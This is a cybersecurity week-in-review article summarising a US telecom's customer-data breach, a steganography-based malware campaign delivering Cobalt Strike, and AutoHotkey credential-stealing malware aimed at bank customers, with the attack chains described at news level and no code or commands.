Cybersecurity Week in Review: 12/28

This week we highlight a breach involving customer data of a wireless carrier in the United States; a particularly creative virus whose payload is delivered via steganography; and credential-stealing malware targeting customers of a large US bank. 

Telecommunications company’s records breached

A major US telecommunications company began sending notifications to its customers last week informing them of a ‘security incident’ that exposed information in their accounts, including phone numbers and call records.

According to the company, they had recently discovered “malicious, unauthorized access” to their systems. A cybersecurity firm performed an investigation and confirmed a breach to the company’s customer proprietary network information (CPNI).

In a statement, the telecommunications firm indicated: “The CPNI accessed may have included phone number, number of lines subscribed to on your account and, in some cases, call-related information collected as part of the normal operation of your wireless service.” The statement further indicated that no account holder names, physical address, credit card information, social security numbers, email addresses, PINs, or passwords were exposed.

One silver lining to this breach appears to be the very small number of customers affected. Only 0.2% or approximately 200,000 people of the company’s total 100 million subscribers had data stolen.

In breaches such as this, it is common for the criminals to use the stolen information in phishing campaigns. Therefore, the telecommunications company notified affected customers by text alert and encouraged them to watch out for any unusual text messages claiming to be from the telecommunications provider and asking for personal information or containing links to other websites.

This isn’t the first time this particular company experienced a breach—previous incidents exposing customer data occurred in 2018, 2019 and March of 2020.

You can read more on this breach here and here.

Researchers find malware hidden in images

The art of steganography—hiding messages within other messages, objects, or images—has been in use for thousands of years. In today’s world, cybercriminals often put the technique to good use, as they recently did by hiding instructions for downloading a new strain of malware in image files hosted on a popular image hosting and online sharing site. 

To install the malware, targets initially receive a Word file via email. When opened, the file launches macros that download a PowerShell script from GitHub. The script then employs the steganography method to download an image file from the image hosting and sharing site. Within the image file are pixel values with instructions for the PowerShell script to execute the payload.

The payload is a legitimate penetration testing toolkit known as Cobalt Strike. By deploying the toolkit, threat actors can deploy ‘beacons’ on the target devices to conduct remote malicious activities, including executing PowerShell scripts, creating shells, spawning new ‘listener’ sessions, and performing privilege escalation. The malware script includes an EICAR string—a legitimate virus test file that enables cybersecurity professionals to test antivirus software without having to use actual malware. By including an EICAR string, security researchers believe the criminals are attempting to trick both the security tools and the security operations center (SOC) teams into believing the malicious payload is really a legitimate antivirus test currently being performed by cybersecurity professionals.

Once installed, the malicious payload contacted a command and control (C&C) server for further instructions. However, since the malware was discovered by security researchers, it appears the domain associated with the C&C server (which had been operational at least as early as the 20^th of December 2020), as well as the GitHub pages, were no longer accessible.

The malware resembles another threat known as MuddyWater, SeedWorm, or TEMP.Zagros first observed in 2017 and distributed by a government-backed advanced persistent threat (APT) group.

Cybercriminals are increasingly using legitimate tools and services such as GitHub and Pastebin to deliver threats. In fact, we recently wrote about the botnet “Gitpaste-12,” which targeted servers and IoT devices for botnet expansion by using GitHub and Pastebin. (You can read more in our article “Malware worm targets servers and IoT devices”). Criminals have also previously used steganography to deploy ransomware.

More information on this new strain of malware is available here.

US and Canadian banking customers targeted with malware

Customers of one of the largest financial institutions in the United States are among those targeted with a recent credential stealing malware written in the AutoHotkey (AHK) scripting language. 

Designed for use with Microsoft Windows, AHK is an open-source scripting language created to provide easy hotkeys to automate repetitive tasks associated with macro-creation and software automation in a Windows application.

The malware involves a multi-stage infection chain and begins with an Excel file embedded with a Visual Basic for Applications (VBA) AutoOpen macro used to drop and execute the malware downloader script (“adb.ahk”) via a legitimate AHK script compiler executable (“adb.exe”). The script is designed to achieve persistence, profile victims, and download and run additional AHK scripts from C&C servers located in the US and northern Europe. 

The malware specifically targets browsers, including Chrome, Opera, and Edge, for stored user credential information. The malware downloads an SQLite module on the infected device to perform SQL queries on SQLite databases within the browsers’ application folders. Credentials are then collected and decrypted and then removed for storage on the C&C server in plaintext via an HTTP POST request.

What makes the malware particularly unique is the use of AHK scripts to execute different tasks, instead of engaging with the C&C server to deliver commands. According to researchers, this method offers a level of customization to the criminals to target individual users or a group of users. It also obfuscates key components of the malware from sandboxes and security researchers.

Security researchers have indicated that the malware is well written and well organized at the code level and includes instructions in Russian, suggesting a hack-for-hire criminal group behind the threat.

More on the AutoHotkey banking malware can be found here and here.

Final Words

Creativity and simplicity are often at the heart of any successful threat, and this week’s stories highlight these concepts extremely well. 

Steganography goes back thousands of years (purportedly as far back as 440 BC Greece). Modern steganography applications can involve digital tools such as text, sound, or image files. In the case of the malware that delivered the Cobalt Strike payload, the image used for steganography appeared relatively benign and looked like nothing more than clip art representing icons for .PNG, .JPG, .GIF, and .SWF files.

In the case of the credential-stealing malware created using the AHK scripting language, criminals were able to customize their threats and further obfuscate the malware from security tools, something that might otherwise be difficult using another script execution technique.

And, by simplifying the locations where malicious scripts are stored using legitimate services such as GitHub, criminals can leverage existing tools and services, without having to reinvent and manage them on their own.

Cybercriminals are always looking for a new angle to successfully deliver threats. It pays to never underestimate criminal capabilities, ingenuity and tenacity.